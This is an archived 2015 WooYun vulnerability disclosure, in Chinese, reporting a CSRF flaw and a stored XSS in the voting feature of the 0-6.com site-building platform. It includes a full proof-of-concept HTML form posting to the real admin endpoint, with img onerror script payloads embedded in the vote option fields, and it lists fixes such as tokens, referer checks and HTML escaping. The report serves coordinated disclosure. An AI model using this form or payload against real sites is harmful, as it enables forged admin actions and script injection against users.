乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-16: 细节已通知厂商并且等待厂商处理中 2015-04-18: 厂商已经确认,细节仅向厂商公开 2015-04-28: 细节向核心白帽子及相关领域专家公开 2015-05-08: 细节向普通白帽子公开 2015-05-18: 细节向实习白帽子公开 2015-06-02: 细节向公众公开
附加一枚XSS
第一枚:CSRF
测试位置处,发起一个新的测试
可以看到提交的表单,有csrf。我们构造表单本地提交看看。
<form method="POST" name="form0" action="http://my.0-6.com:80/admin/App/Vote/save.do"><input type="hidden" name="AppVoteInfo.Id" value=""/><input type="hidden" name="AppVoteInfo.OptionCount" value=""/><input type="hidden" name="AppVoteInfo.Name" value="csrftest"/><input type="hidden" name="AppVoteInfo.Note" value=""/><input type="hidden" name="VoteOptionId" value="0"/><input type="hidden" name="VoteOptionTitle" value=" <img src"/><input type="hidden" name="VoteOptionId" value="0"/><input type="hidden" name="VoteOptionTitle" value=" <img src"/><input type="hidden" name="VoteOptionId" value="0"/><input type="hidden" name="VoteOptionTitle" value="<img src="x"onerror="alert(1)">"/><input type="hidden" name="VoteOptionId" value="0"/><input type="hidden" name="VoteOptionTitle" value="<img src="x"onerror="alert(1)">"/><input type="hidden" name="VoteOptionId" value="0"/><input type="hidden" name="VoteOptionTitle" value="<img src="x"onerror="alert(1)">"/><input type="hidden" name="VoteOptionId" value="0"/><input type="hidden" name="VoteOptionTitle" value=""/><input type="hidden" name="VoteOptionId" value="0"/><input type="hidden" name="VoteOptionTitle" value=""/><input type="hidden" name="VoteOptionId" value="0"/><input type="hidden" name="VoteOptionTitle" value=""/><input type="hidden" name="VoteOptionId" value="0"/><input type="hidden" name="VoteOptionTitle" value=""/><input type="hidden" name="VoteOptionId" value="0"/><input type="hidden" name="VoteOptionTitle" value=""/><input type="hidden" name="VoteOptionId" value=""/><input type="hidden" name="VoteOptionTitle" value=""/><input type="hidden" name="VoteOptionId" value=""/><input type="hidden" name="VoteOptionTitle" value=""/><input type="hidden" name="VoteOptionId" value=""/><input type="hidden" name="VoteOptionTitle" value=""/><input type="hidden" name="VoteOptionId" value=""/><input type="hidden" name="VoteOptionTitle" value=""/><input type="hidden" name="VoteOptionId" value=""/><input type="hidden" name="VoteOptionTitle" value=""/><input type="hidden" name="VoteOptionId" value=""/><input type="hidden" name="VoteOptionTitle" value=""/><input type="hidden" name="VoteOptionId" value=""/><input type="hidden" name="VoteOptionTitle" value=""/><input type="hidden" name="VoteOptionId" value=""/><input type="hidden" name="VoteOptionTitle" value=""/><input type="hidden" name="VoteOptionId" value=""/><input type="hidden" name="VoteOptionTitle" value=""/><input type="hidden" name="VoteOptionId" value=""/><input type="hidden" name="VoteOptionTitle" value=""/><input type="hidden" name="AppVoteInfo.MutSelect" value="0"/><input type="hidden" name="AppVoteInfo.VoteLevel" value="0"/><input type="hidden" name="LimitYear" value="2015"/><input type="hidden" name="LimitMonth" value="4"/><input type="hidden" name="LimitDay" value="22"/><input type="hidden" name="LimitHour" value="17"/><input type="hidden" name="AppVoteInfo.HomePageShow" value="1"/><input type="hidden" name="Invite" value="1"/></form>
投票成功我们查看一下
投票位置同样存在。第二枚:XSS刚刚单独提交了一枚投票处的XSS,测试位置同样存在一枚。
http://12293623.0-6.com/
使用IE访问可以触发跨站。
#csrf1、token2、判断来源#XSS1、html转义
危害等级:中
漏洞Rank:10
确认时间:2015-04-18 15:36
已经修复
暂无